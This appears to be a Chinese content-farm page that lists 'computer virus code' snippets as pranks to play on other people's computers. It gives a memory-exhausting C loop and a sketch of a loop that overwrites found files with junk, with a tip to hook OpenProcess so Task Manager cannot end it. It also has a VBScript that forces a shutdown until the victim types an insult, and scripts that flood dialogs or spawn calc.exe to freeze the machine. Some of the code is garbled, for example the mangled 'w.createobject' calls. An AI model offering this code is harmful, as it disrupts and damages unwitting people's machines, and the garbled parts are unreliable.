本文整理于网络,仅供阅读参考 计算机病毒代码有哪些 计算机病毒代码介绍一: void main() { while(1) {} }//死循环,电脑用不了 或者这样 void main() { while(1) { char *a=new char(1024); } }//吃光你的内存 还能这样 #include #include void main() { ..........//循环查找文件写入垃圾数据,省略若干代码 本文整理于网络,仅供阅读参考 } 最好hook openprocess这个东东让任务管理器都结束不掉 想象力是无限的,看你怎么玩。 计算机病毒代码介绍二: 给你个恶搞的玩on error resume next dim wshshella set wshshella = w.createobject("w.shell") wshshella.run "cmd.exe /c shutdown -r -t 60 -c ""说我是猪,不说我是猪就一分钟关你机,不信,试试···"" ",0 ,true dim a do while(a "我是猪") a = inputbox ("说我是猪,就不关机,快撒,说 ""我是猪"" ","说不说","不说",8000,7000) msgbox chr(13) + chr(13) + chr(13) + a,0,"msgbox" loop msgbox chr(13) + chr(13) + chr(13) + "早说就行了嘛" dim wshshell set wshshell = w.createobject("w.shell") wshshell.run "cmd.exe /c shutdown -a",0 ,true msgbox chr(13) + chr(13) + chr(13) + "哈哈哈哈,真过瘾" 计算机病毒代码介绍三: 最简单的一个电脑病毒 1.vbs版本: 本文整理于网络,仅供阅读参考 打开记事本,输入以下代码: do until 1=2 w.echo "烦死你!" loop 保存为1.vbs,运行后不断出现"烦死你"的对话框。 2.vb6版本: 打开visual basic 6.0,双击窗体,输入以下代码: private sub form_load() do until 1=2 me.hide me.show shell "calc.exe" loop end sub 保存后编译为exe文件,运行后马上死机。 看了“计算机病毒代码有哪些”文章的 本文来源:https://www.wddqw.com/doc/418cd7f1bdd126fff705cc1755270722192e5987.html